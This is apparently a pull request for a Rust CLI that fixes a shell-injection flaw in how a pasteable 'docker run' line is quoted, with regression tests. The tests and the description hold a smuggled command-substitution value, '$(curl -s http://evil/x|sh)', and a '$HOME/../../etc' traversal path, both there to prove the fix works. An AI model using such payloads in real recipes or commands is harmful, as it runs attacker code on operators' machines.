### PR TITLE
fix(docker): mark what the renderer wrote, do not guess it from the text

### DIFF
--- a/crates/atlasctl-core/src/docker/command.rs
+++ b/crates/atlasctl-core/src/docker/command.rs
@@ -68,12 +68,51 @@ pub struct DockerCommand {
     pub command: Vec<String>,
 }
 
-/// Whether an argument contains a substitution we intend the shell to perform.
+/// One rendered argument, and whether the shell is meant to interpret it.
 ///
-/// Deliberately narrow: only the two forms this renderer itself produces. Any
-/// other `$` came from recipe data and must still be quoted.
-fn is_symbolic(arg: &str) -> bool {
-    arg.contains("$(id -u)") || arg.starts_with("$HOME/") || arg.contains(":$HOME/")
+/// The flag is set where the renderer WRITES a substitution, never inferred
+/// from the text afterwards. That distinction is the whole security property:
+/// `is_symbolic` used to decide by substring, so any argument that merely
+/// CONTAINED `$(id -u)` was emitted unquoted — including a recipe's own `env:`
+/// value, which reaches argv as `-e KEY=<value>` and comes from a remote
+/// index. A recipe could therefore put `$(curl … | sh)` beside `$(id -u)` in
+/// one value and have it printed raw into the line an operator is told to
+/// paste. The old doc comment stated the correct rule — "any other `$` came
+/// from recipe data and must still be quoted" — and the substring test did not
+/// implement it.
+#[derive(Debug, Clone)]
+struct Arg {
+    text: String,
+    /// True only for text this renderer produced itself.
+    symbolic: bool,
+}
+
+impl From<String> for Arg {
+    fn from(text: String) -> Self {
+        Self {
+            text,
+            symbolic: false,
+        }
+    }
+}
+
+impl From<&str> for Arg {
+    fn from(text: &str) -> Self {
+        Self {
+            text: text.to_owned(),
+            symbolic: false,
+        }
+    }
+}
+
+impl Arg {
+    /// An argument the renderer wrote a substitution into on purpose.
+    fn symbolic(text: impl Into<String>) -> Self {
+        Self {
+            text: text.into(),
+            symbolic: true,
+        }
+    }
 }
 
 /// Which rendering of the user block to emit.
@@ -88,7 +127,12 @@ enum UserRender {
 impl DockerCommand {
     /// The argv, executed directly — there is no shell anywhere in this path.
     pub fn to_argv(&self) -> Vec<String> {
+        // Execution takes the text only: there is no shell on this path, so
+        // the symbolic marking is meaningless here by construction.
         self.render(UserRender::Resolved, None)
+            .into_iter()
+            .map(|a| a.text)
+            .collect()
     }
 
     /// A pasteable line that keeps host-specific values symbolic.
@@ -103,33 +147,42 @@ impl DockerCommand {
     pub fn display_portable(&self, home: Option<&str>) -> String {
         self.render(UserRender::Portable, home)
             .into_iter()
-            .map(|a| if is_symbolic(&a) { a } else { shell_quote(&a) })
+            .map(|a| {
+                if a.symbolic {
+                    a.text
+                } else {
+                    shell_quote(&a.text)
+                }
+            })
             .collect::<Vec<_>>()
             .join(" ")
     }
 
-    fn render(&self, user_render: UserRender, home: Option<&str>) -> Vec<String> {
-        let mut v = vec!["docker".to_string(), "run".to_string()];
+    fn render(&self, user_render: UserRender, home: Option<&str>) -> Vec<Arg> {
+        let mut v: Vec<Arg> = vec!["docker".into(), "run".into()];
         if self.detach {
             v.push("-d".into());
         }
         if let Some(ep) = &self.entrypoint {
             v.push("--entrypoint".into());
-            v.push(ep.clone());
+            v.push(ep.clone().into());
         }
         if self.privileged {
             v.push("--privileged".into());
         }
-        v.extend(self.device_flags.iter().cloned());
-        v.push(format!("--ipc={}", self.ipc));
-        v.push(format!("--shm-size={}", self.shm_size));
-        v.push(format!("--network={}", self.network));
+        v.extend(self.device_flags.iter().map(|f| Arg::from(f.clone())));
+        v.push(format!("--ipc={}", self.ipc).into());
+        v.push(format!("--shm-size={}", self.shm_size).into());
+        v.push(format!("--network={}", self.network).into());
 
         if let Some(u) = &self.user {
             v.push("--user".into());
             v.push(match user_render {
-                UserRender::Resolved => format!("{}:{}", u.uid, u.gid),
-                UserRender::Portable => "$(id -u):$(id -g)".into(),
+                UserRender::Resolved => Arg::from(format!("{}:{}", u.uid, u.gid)),
+                // The one place this substitution is written, so the one place
+                // it is marked. Quoting it would make the pasted command run
+                // as a user literally named `$(id -u)`.
+                UserRender::Portable => Arg::symbolic("$(id -u):$(id -g)"),
             });
             // Without these the container has a uid it cannot name, and tools
             // that look the user up fail in confusing ways.
@@ -141,53 +194,62 @@ impl DockerCommand {
 
         for o in &self.security_opts {
             v.push("--security-opt".into());
-            v.push(o.clone());
+            v.push(o.clone().into());
         }
         for c in &self.cap_add {
-            v.push(format!("--cap-add={c}"));
+            v.push(format!("--cap-add={c}").into());
         }
         for u in &self.ulimits {
             v.push("--ulimit".into());
-            v.push(u.clone());
+            v.push(u.clone().into());
         }
         for d in &self.devices {
             v.push("--device".into());
-            v.push(d.clone());
+            v.push(d.clone().into());
         }
         if let Some(m) = &self.memory {
-            v.push(format!("--memory={m}"));
+            v.push(format!("--memory={m}").into());
         }
         for (k, val) in &self.labels {
             v.push("--label".into());
-            v.push(format!("{k}={val}"));
+            v.push(format!("{k}={val}").into());
         }
         if self.auto_remove {
             v.push("--rm".into());
         }
         if let Some(r) = &self.restart {
             v.push("--restart".into());
-            v.push(r.clone());
+            v.push(r.clone().into());
         }
         v.push("--name".into());
-        v.push(self.name.clone());
+        v.push(self.name.clone().into());
 
         for (k, val) in &self.env {
             v.push("-e".into());
-            v.push(format!("{k}={val}"));
+            v.push(format!("{k}={val}").into());
         }
         for (host, ctr) in &self.volumes {
-            let host = match (user_render, home) {
+            // `rewritten` records whether WE substituted `$HOME`, rather than
+            // asking afterwards whether the text looks like we did — a recipe
+            // may name a volume that already starts with `$HOME/`, and that is
+            // data, not something to let the shell expand.
+            let (host, rewritten) = match (user_render, home) {
                 (UserRender::Portable, Some(h)) if !h.is_empty() && host.starts_with(h) => {
-                    format!("$HOME{}", &host[h.len()..])
+                    (format!("$HOME{}", &host[h.len()..]), true)
                 }
-                _ => host.clone(),
+                _ => (host.clone(), false),
             };
             v.push("-v".into());
-            v.push(format!("{host}:{ctr}"));
+            let spec = format!("{host}:{ctr}");
+            v.push(if rewritten {
+                Arg::symbolic(spec)
+            } else {
+                Arg::from(spec)
+            });
         }
 
-        v.push(self.image.clone());
-        v.extend(self.command.iter().cloned());
+        v.push(self.image.clone().into());
+        v.extend(self.command.iter().map(|c| Arg::from(c.clone())));
         v
     }
 }

--- a/crates/atlasctl-core/src/docker/command/tests.rs
+++ b/crates/atlasctl-core/src/docker/command/tests.rs
@@ -202,3 +202,48 @@ fn a_dollar_sign_from_recipe_data_is_still_quoted_in_the_portable_form() {
         "recipe-supplied substitutions must stay inert: {portable}"
     );
 }
+
+/// Recipes arrive from a remote index, so a recipe's `env:` value is data, not
+/// something the shell should interpret. It reaches argv as `-e KEY=<value>`,
+/// and `display_portable` prints the line an operator is told to paste.
+///
+/// The old `is_symbolic` matched by SUBSTRING, so any argument merely
+/// containing `$(id -u)` was emitted unquoted — letting a recipe smuggle a
+/// second command substitution alongside it and have the operator's own shell
+/// run it. The renderer now marks what IT wrote rather than guessing from the
+/// text afterwards.
+#[test]
+fn a_recipe_env_value_cannot_smuggle_a_command_substitution() {
+    let mut c = sample();
+    c.env.insert(
+        "LEAK".to_owned(),
+        "$(id -u)$(curl -s http://evil/x|sh)".to_owned(),
+    );
+    let portable = c.display_portable(Some("/home/spark"));
+    // Quoted, not absent: the operator should still SEE what the recipe asked
+    // for. What must not happen is the shell running it.
+    assert!(
+        portable.contains("-e 'LEAK=$(id -u)$(curl -s http://evil/x|sh)'"),
+        "the env value was not quoted as a single literal argument: {portable}"
+    );
+    // The user block still renders symbolically — quoting it would paste a
+    // command that runs as a user literally named `$(id -u)`.
+    assert!(
+        portable.contains("--user $(id -u):$(id -g)"),
+        "the intended substitution was quoted away: {portable}"
+    );
+}
+
+/// A recipe may name a volume that already begins with `$HOME/`. The renderer
+/// did not write that, so the shell must not expand it.
+#[test]
+fn a_recipe_volume_that_looks_rewritten_is_still_quoted() {
+    let mut c = sample();
+    c.volumes
+        .insert("$HOME/../../etc".to_owned(), "/mnt".to_owned());
+    let portable = c.display_portable(Some("/home/spark"));
+    assert!(
+        !portable.contains(" $HOME/../../etc:/mnt"),
+        "a recipe-supplied $HOME escaped quoting: {portable}"
+    );
+}


### PR DESCRIPTION
`display_portable` emits an argument **unquoted** when it looks symbolic, so a pasted command can expand `$(id -u)` and `$HOME`. `is_symbolic` decided that by **substring**:

```rust
arg.contains("$(id -u)") || arg.starts_with("$HOME/") || arg.contains(":$HOME/")
```

Its own doc comment states the rule it was meant to implement — *"only the two forms this renderer itself produces; any other `$` came from recipe data and must still be quoted"* — and `contains` does not implement it.

Recipes are fetched from a **remote index**. A recipe `env:` value reaches argv as `-e KEY=<value>`, so one containing `$(id -u)` anywhere was printed raw into the line an operator is told to paste:

```yaml
env: { LEAK: "$(id -u)$(curl -s http://evil/x|sh)" }
```

`shell_quote` — the entire defence for that rendering — was bypassed by the attacker's own choice of substring.

The renderer now **marks** the two places it writes a substitution and the quoter reads the mark. `Arg` carries the flag; `From<String>`/`From<&str>` default it to false, so every existing `v.push(x.into())` stays data by construction. A recipe naming a volume that already starts with `$HOME/` is data too, and stays quoted.

**Four attempts to prove the test works.** Two mutations failed to compile (`unused variable`, then `field never read` under `deny(warnings)`) and printed no failures — which reads exactly like a test that misses them. A third silently did not *apply*, because `cargo fmt` had reflowed the line my patch anchored on, so it "passed" against unmutated code. The mutation that both compiles and applies is `a.symbolic || a.text.contains("$(id -u)")`, and it fails the test. 707 tests.